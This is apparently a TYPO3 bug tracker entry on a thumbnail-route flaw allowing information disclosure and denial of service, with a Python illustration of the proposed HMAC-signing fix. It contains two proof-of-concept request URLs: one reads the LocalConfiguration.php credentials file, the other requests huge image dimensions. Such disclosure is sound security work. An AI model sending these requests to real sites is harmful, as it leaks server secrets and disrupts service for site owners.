Bug #85875

Updated by Oliver Hader about 1 year ago

* information disclosure (fileIdentifier can be arbitrary, supports fallback zero-storage)
* denial of service (dimensions, basically whole configuration can be arbitrary)

Introduced in https://review.typo3.org/#/c/56765/ - not yet released in either 9.4.0 or 8.7.19

Solution: Add HMAC to all HTTP request parameters.

PoC

h2. Information Disclosure

<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=typo3conf/LocalConfiguration.php&processingInstructions%5Bwidth%5D=64
&processingInstructions%5Bheight%5D=64c
&processingInstructions%5Bcrop%5D=
</pre>

h2. Denial of Service

<pre>
http://ip9.local/typo3/index.php?route=%2Fthumbnails&token=f956bed9f5fa218860ef00491b37d9ede93b7731
&fileIdentifier=1%3A%2Fuser_upload%2Fafter_01.png
&processingInstructions%5Bwidth%5D=1000000
&processingInstructions%5Bheight%5D=1000000c
&processingInstructions%5Bcrop%5D=
</pre>
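The proposed fix, signing every request parameter with an HMAC, as an added example in Python. This is not TYPO3's code and not the patch that went in; it only illustrates the mechanism. Assumptions: HMAC-SHA256 keyed with a constructed placeholder secret standing in for a server-side key such as the encryptionKey; the parameter names (`fileIdentifier`, `processingInstructions[width|height|crop]`) are taken from the PoC URLs above, while `route` and `token` are left out. `tamper_query` reproduces the attacker's move from both PoCs: keep the server-issued URL but swap the file identifier or the dimensions.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl, urlencode

# Constructed example secret standing in for a server-side key such as
# TYPO3's encryptionKey. Not a real value.
ENCRYPTION_KEY = b"constructed-example-key-0123456789abcdef"


def flatten(params: dict) -> list:
    """Serialize {'processingInstructions': {'width': '64'}} as
    [('processingInstructions[width]', '64')], sorted at every level, so
    the signed string is deterministic and covers every parameter except
    the signature itself."""
    pairs = []
    for key in sorted(params):
        if key == "hmac":
            continue
        value = params[key]
        if isinstance(value, dict):
            for sub in sorted(value):
                pairs.append((f"{key}[{sub}]", str(value[sub])))
        else:
            pairs.append((key, str(value)))
    return pairs


def unflatten(query: str) -> dict:
    """Parse 'a[b]=c&d=e' back into {'a': {'b': 'c'}, 'd': 'e'}."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.endswith("]") and "[" in key:
            top, sub = key[:-1].split("[", 1)
            params.setdefault(top, {})[sub] = value
        else:
            params[key] = value
    return params


def sign_params(params: dict, key: bytes = ENCRYPTION_KEY) -> str:
    """HMAC-SHA256 over the canonical form of all request parameters."""
    message = urlencode(flatten(params)).encode("utf-8")
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def build_thumbnail_query(file_identifier: str, width: str, height: str,
                          crop: str = "", key: bytes = ENCRYPTION_KEY) -> str:
    """Generating side: the server chooses fileIdentifier and dimensions,
    then appends an HMAC binding all of them together."""
    params = {
        "fileIdentifier": file_identifier,
        "processingInstructions": {"width": width, "height": height, "crop": crop},
    }
    return urlencode(flatten(params) + [("hmac", sign_params(params, key))])


def verify_thumbnail_query(query: str, key: bytes = ENCRYPTION_KEY):
    """Receiving side: return the parsed parameters only if the HMAC
    matches; None for a missing or mismatching signature."""
    params = unflatten(query)
    presented = params.pop("hmac", None)
    if not presented:
        return None
    expected = sign_params(params, key)
    # Constant-time comparison: a plain == would leak how many leading
    # bytes of a forged MAC were correct.
    if not hmac.compare_digest(expected, presented):
        return None
    return params


def tamper_query(query: str, key_path: str, new_value: str) -> str:
    """Attacker's move from the PoCs: keep the original hmac but swap one
    parameter, e.g. 'fileIdentifier' or 'processingInstructions[width]'."""
    params = unflatten(query)
    top, _, sub = key_path.partition("[")
    if sub:
        params[top][sub.rstrip("]")] = new_value
    else:
        params[top] = new_value
    presented = params.pop("hmac")
    return urlencode(flatten(params) + [("hmac", presented)])


if __name__ == "__main__":
    issued = build_thumbnail_query("1:/user_upload/after_01.png", "64", "64c")
    print("issued:   ", verify_thumbnail_query(issued))
    forged = tamper_query(issued, "fileIdentifier", "typo3conf/LocalConfiguration.php")
    print("disclosure attempt:", verify_thumbnail_query(forged))
    forged = tamper_query(issued, "processingInstructions[width]", "1000000")
    print("DoS attempt:       ", verify_thumbnail_query(forged))
```

Two caveats a reviewer would check in the real patch. First, the canonical form must cover every parameter the handler reads; here everything except `hmac` is signed, so adding or changing any key or sub-key invalidates the signature. Second, a MAC only proves the server issued those values, so the generating side still has to refuse to sign identifiers that do not resolve through a real storage and dimensions beyond what the image processor should be asked for; a signature over a bad value is still a valid signature.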
